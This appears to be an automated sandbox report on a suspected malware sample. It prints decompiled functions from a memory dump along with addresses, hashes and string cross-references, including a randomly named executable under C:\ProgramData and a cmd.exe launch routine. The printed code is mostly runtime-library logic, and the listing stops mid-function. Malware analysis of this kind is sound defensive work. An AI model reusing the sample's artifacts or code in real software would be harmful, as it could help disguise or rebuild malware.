Uniqueness Score: -1.00%

Function 00B48521, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00B48521(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, char _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				signed char _v28;
				intOrPtr _t79;
				signed char _t83;
				void* _t85;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr _t91;
				intOrPtr* _t92;
				void* _t93;
				intOrPtr* _t96;
				intOrPtr* _t100;
				intOrPtr* _t101;
				void* _t120;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr* _t136;
				intOrPtr* _t137;
				intOrPtr* _t138;

				_t124 = __ecx;
				_t120 = __ebx;
				_t79 =  *((intOrPtr*)(__ecx + 4));
				if(_t79 >= 0x3fffffe) {
					E00B484B2(_a20);
					E00B4BE84("map/set<T> too long");
					asm("int3");
					_push(0xc);
					E00B64BBE();
					_t121 = _t124;
					_v8 = _v8 & 0x00000000;
					_t132 =  *_t121;
					_t136 =  *((intOrPtr*)(_t132 + 4));
					_t83 = 1;
					_v28 = 1;
					while( *((char*)(_t136 + 0xd)) == 0) {
						_t132 = _t136;
						_t52 = _t136 + 0x10; // 0x10
						_t93 = _t52;
						if(_a8 == 0) {
							_t83 = E00B46D65(_a12, _t93);
						} else {
							_t83 = E00B46D65(_t93, _a12) ^ 0x00000001;
						}
						_v28 = _t83;
						if(_t83 == 0) {
							_t136 =  *((intOrPtr*)(_t136 + 8));
						} else {
							_t136 =  *_t136;
						}
					}
					_t137 = _t132;
					_v24 = _t137;
					if(_t83 == 0) {
						L47:
						_t74 = _t137 + 0x10; // 0x11
						_t85 = E00B46D65(_t74, _a12);
						_push(_a16);
						if(_t85 == 0) {
							E00B484B2();
							_t87 = _a4;
							 *_t87 = _t137;
							 *((char*)(_t87 + 4)) = 0;
						} else {
							_push(_t124);
							_push(_t132);
							_push(_v28);
							goto L35;
						}
					} else {
						if(_t132 !=  *((intOrPtr*)( *_t121))) {
							if( *((char*)(_t132 + 0xd)) == 0) {
								_t91 =  *_t132;
								if( *((char*)(_t91 + 0xd)) == 0) {
									do {
										_t137 = _t91;
										_t91 =  *((intOrPtr*)(_t137 + 8));
									} while ( *((char*)(_t91 + 0xd)) == 0);
									goto L46;
								} else {
									while(1) {
										_t92 =  *((intOrPtr*)(_t137 + 4));
										if( *((char*)(_t92 + 0xd)) != 0 || _t137 !=  *_t92) {
											break;
										}
										_t137 = _t92;
										_v24 = _t137;
									}
									if( *((char*)(_t137 + 0xd)) == 0) {
										_t137 = _t92;
										goto L46;
									}
								}
							} else {
								_t137 =  *((intOrPtr*)(_t132 + 8));
								L46:
								_v24 = _t137;
							}
							goto L47;
						} else {
							_push(_a16);
							_push(_t124);
							_push(_t132);
							_push(1);
							L35:
							_push( &_a8);
							_t89 = E00B48521(_t121, _t121, _t132, _t137);
							_t87 = _a4;
							 *_t87 =  *_t89;
							 *((char*)(_t87 + 4)) = 1;
						}
					}
					E00B64B2D();
					return _t87;
				} else {
					_push(__esi);
					_push(__edi);
					_t133 = _a20;
					 *((intOrPtr*)(__ecx + 4)) = _t79 + 1;
					_t96 = _a12;
					 *((intOrPtr*)(_t133 + 4)) = _t96;
					_t127 =  *__ecx;
					if(_t96 != _t127) {
						if(_a8 == 0) {
							 *((intOrPtr*)(_t96 + 8)) = _t133;
							_t128 =  *__ecx;
							if(_t96 ==  *((intOrPtr*)(_t128 + 8))) {
								 *((intOrPtr*)(_t128 + 8)) = _t133;
							}
						} else {
							 *_t96 = _t133;
							_t130 =  *__ecx;
							if(_t96 ==  *_t130) {
								 *_t130 = _t133;
							}
						}
					} else {
						 *((intOrPtr*)(_t127 + 4)) = _t133;
						 *((intOrPtr*)( *__ecx)) = _t133;
						 *((intOrPtr*)( *__ecx + 8)) = _t133;
					}
					_t138 = _t133;
					if( *((char*)( *((intOrPtr*)(_t133 + 4)) + 0xc)) == 0) {
						_push(_t120);
						do {
							_t101 =  *((intOrPtr*)(_t138 + 4));
							_t122 =  *((intOrPtr*)(_t101 + 4));
							_t129 =  *_t122;
							if(_t101 != _t129) {
								if( *((char*)(_t129 + 0xc)) != 0) {
									if(_t138 ==  *_t101) {
										_t138 = _t101;
										E00B475CA(_t124, _t138);
									}
									 *((char*)( *((intOrPtr*)(_t138 + 4)) + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)) + 0xc)) = 0;
									E00B4760D(_t124,  *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)));
								} else {
									goto L16;
								}
							} else {
								_t129 =  *((intOrPtr*)(_t122 + 8));
								if( *((char*)(_t129 + 0xc)) == 0) {
									L16:
									 *((char*)(_t101 + 0xc)) = 1;
									 *((char*)(_t129 + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)) + 0xc)) = 0;
									_t138 =  *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4));
								} else {
									if(_t138 ==  *((intOrPtr*)(_t101 + 8))) {
										_t138 = _t101;
										E00B4760D(_t124, _t138);
									}
									 *((char*)( *((intOrPtr*)(_t138 + 4)) + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)) + 0xc)) = 0;
									E00B475CA(_t124,  *((intOrPtr*)( *((intOrPtr*)(_t138 + 4)) + 4)));
								}
							}
						} while ( *((char*)( *((intOrPtr*)(_t138 + 4)) + 0xc)) == 0);
					}
					 *((char*)( *((intOrPtr*)( *_t124 + 4)) + 0xc)) = 1;
					_t100 = _a4;
					 *_t100 = _t133;
					return _t100;
				}
			}

0x00b48521
0x00b48521
0x00b48524
0x00b4852c
0x00b48631
0x00b4863b
0x00b48640
0x00b48641
0x00b48648
0x00b4864d
0x00b4864f
0x00b48653
0x00b48655
0x00b48658
0x00b4865a
0x00b4865d
0x00b48663
0x00b48665
0x00b48665
0x00b4866c
0x00b4867f
0x00b4866e
0x00b48677
0x00b48677
0x00b48684
0x00b48689
0x00b4868f
0x00b4868b
0x00b4868b
0x00b4868b
0x00b48689
0x00b48694
0x00b48696
0x00b4869b
0x00b48707
0x00b4870a
0x00b4870e
0x00b48713
0x00b48718
0x00b48721
0x00b48726
0x00b48729
0x00b4872b
0x00b4871a
0x00b4871a
0x00b4871b
0x00b4871c
0x00000000
0x00b4871c
0x00b4869d
0x00b486a1
0x00b486cc
0x00b486d3
0x00b486d9
0x00b486f9
0x00b486f9
0x00b486fb
0x00b486fe
0x00000000
0x00b486db
0x00b486db
0x00b486db
0x00b486e2
0x00000000
0x00000000
0x00b486e8
0x00b486ea
0x00b486ea
0x00b486f3
0x00b486f5
0x00000000
0x00b486f5
0x00b486f3
0x00b486ce
0x00b486ce
0x00b48704
0x00b48704
0x00b48704
0x00000000
0x00b486a3
0x00b486a3
0x00b486a6
0x00b486a7
0x00b486a8
0x00b486aa
0x00b486ad
0x00b486b0
0x00b486b7
0x00b486ba
0x00b486bc
0x00b486bc
0x00b486a1
0x00b486c0
0x00b486c5
0x00b48532
0x00b48532
0x00b48533
0x00b48534
0x00b48538
0x00b4853b
0x00b4853e
0x00b48541
0x00b48545
0x00b48559
0x00b48567
0x00b4856a
0x00b4856f
0x00b48571
0x00b48571
0x00b4855b
0x00b4855b
0x00b4855d
0x00b48561
0x00b48563
0x00b48563
0x00b48561
0x00b48547
0x00b48547
0x00b4854c
0x00b48550
0x00b48550
0x00b48577
0x00b4857d
0x00b48583
0x00b48584
0x00b48584
0x00b48587
0x00b4858a
0x00b4858e
0x00b485c8
0x00b485e6
0x00b485e8
0x00b485eb
0x00b485eb
0x00b485f3
0x00b485fd
0x00b48607
0x00000000
0x00000000
0x00000000
0x00b48590
0x00b48590
0x00b48597
0x00b485ca
0x00b485ca
0x00b485ce
0x00b485d8
0x00b485df
0x00b48599
0x00b4859c
0x00b4859e
0x00b485a1
0x00b485a1
0x00b485a9
0x00b485b3
0x00b485bd
0x00b485bd
0x00b48597
0x00b4860f
0x00b48619
0x00b4861f
0x00b48623
0x00b48626
0x00b4862b
0x00b4862b

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00B4863B
__EH_prolog3_catch.LIBCMT ref: 00B48648

Strings

map/set<T> too long, xrefs: 00B48636

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_catchXinvalid_argumentstd::_
String ID: map/set<T> too long
API String ID: 4202626062-1285458680
Opcode ID: 9ccebb031133ca895f5a66a0f1c3b4bc8630829be0e3241a4874cee8b91c3f2e
Instruction ID: c8a41b34e66cc2519a1d5535b96072d0217310f234eb287253fcef2a24e9737b
Opcode Fuzzy Hash: 9ccebb031133ca895f5a66a0f1c3b4bc8630829be0e3241a4874cee8b91c3f2e
Instruction Fuzzy Hash: 485126706046809FDB51CF18C188B59FBE1EF66324F1AC5C9E8598B262C775EE80EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B5312D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00B5312D(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				intOrPtr* _t57;
				signed int _t63;
				intOrPtr _t65;

				_t48 = _a4;
				if(_t48 != 0) {
					if(_t48 == 2 || _t48 == 1) {
						E00B5A638();
						E00B5A085(0, 0xb6a408, 0x104);
						_t26 =  *0xb6a530; // 0xff33c8
						 *0xb6a520 = 0xb6a408;
						_v20 = _t26;
						if(_t26 == 0 ||  *_t26 == 0) {
							_t26 = 0xb6a408;
							_v20 = 0xb6a408;
						}
						_v8 = 0;
						_v16 = 0;
						_t63 = E00B533DE(E00B53265( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
						if(_t63 != 0) {
							E00B53265( &_v8, _v20, _t63, _t63 + _v8 * 4,  &_v8,  &_v16);
							if(_t48 != 1) {
								_v12 = 0;
								_push( &_v12);
								_t49 = E00B59FB3(_t48, 0, _t63, _t63);
								if(_t49 == 0) {
									_t57 = _v12;
									_t54 = 0;
									_t36 = _t57;
									if( *_t57 == 0) {
										L17:
										_t37 = 0;
										 *0xb6a524 = _t54;
										_v12 = 0;
										_t49 = 0;
										 *0xb6a528 = _t57;
										L18:
										E00B564B8(_t37);
										_v12 = 0;
										goto L19;
									} else {
										goto L16;
									}
									do {
										L16:
										_t36 = _t36 + 4;
										_t54 = _t54 + 1;
									} while ( *_t36 != 0);
									goto L17;
								}
								_t37 = _v12;
								goto L18;
							}
							 *0xb6a524 = _v8 - 1;
							_t43 = _t63;
							_t63 = 0;
							 *0xb6a528 = _t43;
							goto L12;
						} else {
							_t44 = E00B55BBD();
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							L12:
							_t49 = 0;
							L19:
							E00B564B8(_t63);
							_t40 = _t49;
							goto L20;
						}
					} else {
						_t45 = E00B55BBD();
						_t65 = 0x16;
						 *_t45 = _t65;
						E00B528EC();
						_t40 = _t65;
						L20:
						return _t40;
					}
				}
				return 0;
			}

0x00b53136
0x00b5313b
0x00b53148
0x00b53166
0x00b53179
0x00b5317e
0x00b53186
0x00b5318c
0x00b53191
0x00b53198
0x00b5319a
0x00b5319a
0x00b531a0
0x00b531a7
0x00b531c0
0x00b531c7
0x00b531e8
0x00b531f3
0x00b5320e
0x00b53211
0x00b53218
0x00b5321e
0x00b53225
0x00b53228
0x00b5322a
0x00b5322e
0x00b53238
0x00b53238
0x00b5323a
0x00b53240
0x00b53243
0x00b53245
0x00b5324b
0x00b5324c
0x00b53252
0x00000000
0x00000000
0x00000000
0x00000000
0x00b53230
0x00b53230
0x00b53230
0x00b53233
0x00b53234
0x00000000
0x00b53230
0x00b53220
0x00000000
0x00b53220
0x00b531f9
0x00b531fe
0x00b53200
0x00b53202
0x00000000
0x00b531c9
0x00b531c9
0x00b531ce
0x00b531d0
0x00b531d1
0x00b53207
0x00b53207
0x00b53255
0x00b53256
0x00b5325c
0x00000000
0x00b5325e
0x00b5314f
0x00b5314f
0x00b53156
0x00b53157
0x00b53159
0x00b5315e
0x00b5325f
0x00000000
0x00b5325f
0x00b53148
0x00000000

Strings

C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe, xrefs: 00B53170, 00B53177, 00B531AD

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
API String ID: 0-1411296268
Opcode ID: d8b7b5e2b99bc6e6d7ba45559e2fdd70da2ecf88e25e4edb2038e9420e4498f0
Instruction ID: 02310d3229f94a6b4d57073ab50967581eb893d6a5e8e042e055ac31dc8d6865
Opcode Fuzzy Hash: d8b7b5e2b99bc6e6d7ba45559e2fdd70da2ecf88e25e4edb2038e9420e4498f0
Instruction Fuzzy Hash: 2B41B471A00608AFCB21DF998C85B9EBBF8EF94751F1000EAED05E7350DAB58B49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B5097A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00B5097A(signed int __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t18;
				void* _t21;
				char* _t22;
				signed int* _t29;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				intOrPtr _t46;
				signed int _t49;
				signed int _t55;
				void* _t57;

				L0:
				while(1) {
					L0:
					_t37 = __ebx;
					_pop(_t53);
					_t54 = _t55;
					_t18 =  *0xb69014; // 0x26ce9e99
					_v8 = _t18 ^ _t55;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t46 = _a4;
					_t49 = 0;
					_v28 = 0;
					_t21 = E00B5185E( &_v28, 0, "COMSPEC");
					_t57 = _t55 - 0x18 + 0xc;
					if(_t21 == 0 || _t21 != 0x16) {
						break;
					}
					L15:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00B52919();
					asm("int3");
				}
				L3:
				if(_t46 != 0) {
					_t22 = _v32;
					_v28 = _t22;
					_v24 = "/c";
					_v20 = _t46;
					_v16 = _t49;
					if(_t22 == 0) {
						L13:
						_push(_t49);
						_v28 = "cmd.exe";
						_t49 = E00B56D9C(_t37, _t46, _t49, _t49, "cmd.exe",  &_v28);
					} else {
						_t46 =  *((intOrPtr*)(E00B55BBD()));
						_t29 = E00B55BBD();
						_push(_t49);
						 *_t29 = _t49;
						_push( &_v28);
						_t31 = E00B56AC5(_t49, _v28);
						_t57 = _t57 + 0x10;
						_t37 = _t31;
						_t32 = E00B55BBD();
						if(_t37 == 0xffffffff) {
							if( *_t32 == 2 ||  *((intOrPtr*)(E00B55BBD())) == 0xd) {
								 *((intOrPtr*)(E00B55BBD())) = _t46;
								goto L13;
							} else {
								_t49 = _t49 | 0xffffffff;
							}
						} else {
							 *_t32 = _t46;
							_t49 = _t37;
						}
					}
				} else {
					if(_v32 != _t49) {
						_t35 = E00B56EA8(_t37, _t49, _v32, _t49);
						asm("sbb esi, esi");
						_t49 =  ~_t35 + 1;
					}
				}
				E00B564B8(_v32);
				return E00B4AE43(_v12 ^ _t54);
			}

0x00b5097a
0x00b5097a
0x00b5097a
0x00b5097a
0x00b5097f
0x00b5087d
0x00b50882
0x00b50889
0x00b5088c
0x00b5088d
0x00b5088e
0x00b5088f
0x00b50895
0x00b5089e
0x00b508a1
0x00b508a6
0x00b508ab
0x00000000
0x00000000
0x00b5096f
0x00b5096f
0x00b50970
0x00b50971
0x00b50972
0x00b50973
0x00b50974
0x00b50979
0x00b50979
0x00b508b6
0x00b508b8
0x00b508d7
0x00b508da
0x00b508dd
0x00b508e4
0x00b508e7
0x00b508ec
0x00b5093a
0x00b5093a
0x00b50946
0x00b50951
0x00b508ee
0x00b508f3
0x00b508f5
0x00b508fa
0x00b508fb
0x00b50900
0x00b50905
0x00b5090a
0x00b5090d
0x00b5090f
0x00b50917
0x00b50922
0x00b50938
0x00000000
0x00b5092e
0x00b5092e
0x00b5092e
0x00b50919
0x00b50919
0x00b5091b
0x00b5091b
0x00b50917
0x00b508ba
0x00b508bd
0x00b508c7
0x00b508d1
0x00b508d4
0x00b508d4
0x00b508bd
0x00b50956
0x00b5096e

APIs

_free.LIBCMT ref: 00B50956

Strings

COMSPEC, xrefs: 00B50897
cmd.exe, xrefs: 00B5093E, 00B50944

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: COMSPEC$cmd.exe
API String ID: 269201875-2256226045
Opcode ID: b5bd56889811003dd9b44178221e01aca244daf1b5e958918efac45300aaca9e
Instruction ID: 224764720d3e285de2a336df5b5cbf286f262e90e6062d9f08e42b1966079534
Opcode Fuzzy Hash: b5bd56889811003dd9b44178221e01aca244daf1b5e958918efac45300aaca9e
Instruction Fuzzy Hash: 3A31B5719111199F9B20BF998846BAFBBF8DE41322B2101E5FD14A7251EB745E08CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00B60E95, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B60E95(void* __ebx, void* __edi, void* _a4, signed int* _a8) {
				intOrPtr _v0;
				intOrPtr* _v8;
				signed int _v12;
				char _v14;
				short _v16;
				signed int _v20;
				char _v24;
				char _v25;
				signed int* _v32;
				char* _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v60;
				char* _v84;
				signed int* _v96;
				intOrPtr _v124;
				char _v136;
				void* __ecx;
				intOrPtr* _t97;
				void* _t107;
				signed int _t110;
				signed int* _t112;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr _t118;
				void* _t120;
				signed int* _t122;
				void* _t126;
				void* _t127;
				signed int* _t131;
				intOrPtr _t141;
				void* _t142;
				void* _t150;
				void* _t151;
				void* _t152;
				intOrPtr _t154;
				intOrPtr* _t156;
				intOrPtr* _t158;
				intOrPtr _t162;
				void* _t163;
				intOrPtr _t164;
				intOrPtr _t170;
				intOrPtr* _t172;
				intOrPtr _t173;
				signed int _t175;
				char* _t177;
				signed int* _t179;
				signed int _t180;
				intOrPtr _t181;
				void* _t184;
				intOrPtr* _t186;
				signed int* _t188;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr* _t203;
				intOrPtr* _t213;
				signed int _t215;
				intOrPtr _t219;
				intOrPtr* _t220;
				intOrPtr* _t224;
				signed int _t225;
				char _t226;
				intOrPtr* _t227;
				signed int _t228;
				intOrPtr* _t230;
				void* _t231;
				intOrPtr* _t232;
				intOrPtr* _t233;
				signed int _t235;
				void* _t238;
				char* _t239;
				signed int _t241;
				char* _t244;
				void* _t245;
				signed int _t246;
				intOrPtr _t248;
				void* _t250;
				signed int _t252;
				signed int _t254;
				void* _t255;
				void* _t256;

				_push(__ebx);
				_t175 = 0;
				 *_a8 =  *_a8 & 0x00000000;
				_t97 = _a4;
				_t224 = _t97;
				_push(__edi);
				_v8 = _t97;
				_t186 =  *_t97;
				if(_t186 == 0) {
					L5:
					_t177 = 1;
				} else {
					do {
						_t250 = _t186 + 1;
						do {
							_t173 =  *_t186;
							_t186 = _t186 + 1;
						} while (_t173 != 0);
						_t224 = _t224 + 4;
						_t175 = _t175 + _t186 - _t250 + 1;
						_t186 =  *_t224;
					} while (_t186 != 0);
					if(_t175 <= 1) {
						goto L5;
					}
				}
				_t241 = E00B598AF(_t177, 1);
				_pop(_t188);
				if(_t241 != 0) {
					_t235 = _t241;
					_t100 =  *_a4;
					if( *_a4 == 0) {
						L14:
						 *_a8 = _t241;
						goto L15;
					} else {
						while(1) {
							_t107 = E00B56383(_t235, _t241 - _t235 + _t177, _t100);
							_t254 = _t254 + 0xc;
							if(_t107 != 0) {
								break;
							}
							_t232 = _v8;
							_t220 =  *_t232;
							_v8 = _t220 + 1;
							do {
								_t170 =  *_t220;
								_t220 = _t220 + 1;
							} while (_t170 != 0);
							_t188 = _t220 - _v8;
							_t233 = _t232 + 4;
							_t239 = _t235 + _t188;
							_v8 = _t233;
							 *_t239 = 0x20;
							_t235 = _t239 + 1;
							_t100 =  *_t233;
							if(_t100 != 0) {
								continue;
							} else {
								 *((char*)(_t235 - 1)) = _t100;
								goto L14;
							}
							goto L87;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00B52919();
						asm("int3");
						_t252 = _t254;
						_t255 = _t254 - 0x34;
						_t110 =  *0xb69014; // 0x26ce9e99
						_v48 = _t110 ^ _t252;
						_t112 = _v32;
						_push(_t241);
						_t244 = _v36;
						_v84 = _t244;
						 *_t112 =  *_t112 & 0x00000000;
						_v96 = _t112;
						if(_t244 != 0) {
							_v44 = _v44 & 0x00000000;
							_v24 = 0x74737953;
							_v20 = 0x6f526d65;
							_v16 = 0x746f;
							_v14 = 0;
							_t115 = E00B5185E( &_v44, 0,  &_v24);
							_t256 = _t255 + 0xc;
							if(_t115 == 0) {
								_t116 = _v44;
								if(_t116 == 0) {
									_v36 = 0xb;
								} else {
									_t231 = _t116 + 1;
									do {
										_t219 =  *_t116;
										_t116 = _t116 + 1;
									} while (_t219 != 0);
									_v36 = _t116 - _t231 + 0xc;
								}
								_t190 =  *_t244;
								_push(_t177);
								_push(_t235);
								_t179 = 2;
								_v32 = _t179;
								if(_t190 != 0) {
									_t230 = _t244;
									do {
										_t238 = _t190 + 1;
										do {
											_t164 =  *_t190;
											_t190 = _t190 + 1;
										} while (_t164 != 0);
										_t230 = _t230 + 4;
										_t179 = _t179 + _t190 - _t238 + 1;
										_t190 =  *_t230;
									} while (_t190 != 0);
									_v32 = _t179;
								}
								_t235 = E00B5AA59(_t190);
								if(_t235 != 0) {
									_t225 = _t235;
									_v56 = _t235;
									if( *_t235 != 0x3d) {
										do {
											_t215 = _t225;
											_t184 = _t215 + 1;
											do {
												_t163 =  *_t215;
												_t215 = _t215 + 1;
											} while (_t163 != 0);
											_t225 = _t225 + 1 + _t215 - _t184;
										} while ( *_t225 != 0x3d);
										_v56 = _t225;
									}
									_t180 = _t225;
									if( *_t225 == 0x3d) {
										while( *((char*)(_t180 + 1)) != 0 &&  *((char*)(_t180 + 2)) == 0x3a &&  *((char*)(_t180 + 3)) == 0x3d) {
											_t213 = _t180 + 4;
											_v40 = _t213 + 1;
											do {
												_t162 =  *_t213;
												_t213 = _t213 + 1;
											} while (_t162 != 0);
											_t180 = _t180 + 5 + _t213 - _v40;
											if( *_t180 == 0x3d) {
												continue;
											}
											goto L47;
										}
									}
									L47:
									_t181 = _t180 - _t225;
									_v52 = _t244;
									_t226 =  *_t244;
									_v40 = _t181;
									while(_t226 != 0) {
										_t45 =  &_v24; // 0x74737953
										_t191 = _t45;
										_t245 = _t191 + 1;
										do {
											_t118 =  *_t191;
											_t191 = _t191 + 1;
										} while (_t118 != 0);
										_t47 =  &_v24; // 0x74737953
										_t120 = E00B616F6(_t226, _t47, _t191 - _t245);
										_t256 = _t256 + 0xc;
										if(_t120 == 0) {
											_v25 = 1;
											_t122 = _v32 + _t181;
										} else {
											_t158 = _v52 + 4;
											_v52 = _t158;
											_t226 =  *_t158;
											continue;
										}
										L54:
										_v32 = _t122;
										_t244 = E00B598AF(_t122, 1);
										if(_t244 != 0) {
											_t124 = _v40;
											_t177 = _t244;
											if(_v40 == 0) {
												_t188 = _v32;
											} else {
												E00B4D670(_t244, _v56, _t124);
												_t154 = _v40;
												_t256 = _t256 + 0xc;
												_t188 = _v32 - _t154;
												_v32 = _t188;
												_t177 = _t244 + _t154;
											}
											_t126 =  *_v48;
											while(_t126 != 0) {
												_t127 = E00B56383(_t177, _t188, _t126);
												_t256 = _t256 + 0xc;
												if(_t127 != 0) {
													goto L79;
												} else {
													_t227 = _v48;
													_t203 =  *_t227;
													_v40 = _t203 + 1;
													do {
														_t141 =  *_t203;
														_t203 = _t203 + 1;
													} while (_t141 != 0);
													_t142 = _t203 - _v40 + 1;
													_t188 = _v32 - _t142;
													_t177 = _t177 + _t142;
													_t228 = _t227 + 4;
													_v32 = _t188;
													_v48 = _t228;
													_t126 =  *_t228;
													continue;
												}
												goto L87;
											}
											if(_v25 != _t126) {
												L72:
												if(_t177 == _t244) {
													 *_t177 = 0;
													_t177 = _t177 + 1;
												}
												 *_t177 = 0;
												 *_v60 = _t244;
												_t248 = 0;
												goto L75;
											} else {
												_t150 = E00B56383(_t177, _v36,  &_v24);
												_t256 = _t256 + 0xc;
												if(_t150 != 0) {
													goto L79;
												} else {
													_t151 = E00B60E2C(_t177, _v36, 0xb375c0);
													_t256 = _t256 + 0xc;
													if(_t151 != 0) {
														goto L79;
													} else {
														if(_v44 == _t151) {
															L71:
															_t177 = _t177 + _v36;
															goto L72;
														} else {
															_t152 = E00B60E2C(_t177, _v36, _v44);
															_t256 = _t256 + 0xc;
															if(_t152 != 0) {
																goto L79;
															} else {
																goto L71;
															}
														}
													}
												}
											}
										} else {
											E00B55B87(0xe);
											_t156 = E00B55BBD();
											_t248 = 0xc;
											 *_t156 = _t248;
											L75:
											E00B564B8(0);
											goto L76;
										}
										goto L87;
									}
									_v25 = _t226;
									_t122 = _v32 + _t181 + _v36;
									goto L54;
								} else {
									_t248 = 0x16;
									L76:
									E00B564B8(_t235);
									goto L77;
								}
							} else {
								if(_t115 == 0x16) {
									L79:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E00B52919();
									asm("int3");
									_push(_t252);
									_push(_t188);
									_push(_t188);
									_push(_t244);
									_t246 = 0;
									_v136 = 0;
									if(E00B60E95(_t177, _t235, _v124,  &_v136) == 0) {
										_t131 =  &_v20;
										_v20 = 0;
										_push(_t131);
										_push(_v0);
										L17();
										if(_t131 == 0) {
											 *_a4 = _v16;
											 *_a8 = _v20;
											E00B564B8(0);
											E00B564B8(0);
										} else {
											E00B564B8(_v20);
											E00B564B8(_v16);
											_t246 = 0xffffffff;
										}
									} else {
										E00B564B8(_v16);
										_t246 = 0xffffffff;
									}
									return _t246;
								} else {
									_t248 =  *((intOrPtr*)(E00B55BBD()));
									L77:
									E00B564B8(_v44);
									goto L78;
								}
							}
						} else {
							L78:
							return E00B4AE43(_v12 ^ _t252);
						}
					}
				} else {
					E00B55B87(8);
					_t172 = E00B55BBD();
					_push(0xc);
					_pop(0);
					 *_t172 = 0;
					L15:
					E00B564B8(0);
					return 0;
				}
				L87:
			}

0x00b60e9e
0x00b60ea0
0x00b60ea2
0x00b60ea5
0x00b60ea8
0x00b60eaa
0x00b60eab
0x00b60eae
0x00b60eb2
0x00b60ed1
0x00b60ed3
0x00b60eb4
0x00b60eb4
0x00b60eb4
0x00b60eb7
0x00b60eb7
0x00b60eb9
0x00b60eba
0x00b60ec0
0x00b60ec4
0x00b60ec6
0x00b60ec8
0x00b60ecf
0x00000000
0x00000000
0x00b60ecf
0x00b60edc
0x00b60edf
0x00b60ee2
0x00b60efb
0x00b60efd
0x00b60f01
0x00b60f42
0x00b60f45
0x00000000
0x00b60f03
0x00b60f03
0x00b60f0c
0x00b60f11
0x00b60f16
0x00000000
0x00000000
0x00b60f18
0x00b60f1b
0x00b60f20
0x00b60f23
0x00b60f23
0x00b60f25
0x00b60f26
0x00b60f2a
0x00b60f2d
0x00b60f30
0x00b60f32
0x00b60f35
0x00b60f38
0x00b60f39
0x00b60f3d
0x00000000
0x00b60f3f
0x00b60f3f
0x00000000
0x00b60f3f
0x00000000
0x00b60f3d
0x00b60f5c
0x00b60f5d
0x00b60f5e
0x00b60f5f
0x00b60f60
0x00b60f61
0x00b60f66
0x00b60f6a
0x00b60f6c
0x00b60f6f
0x00b60f76
0x00b60f79
0x00b60f7c
0x00b60f7d
0x00b60f80
0x00b60f83
0x00b60f86
0x00b60f8b
0x00b60f94
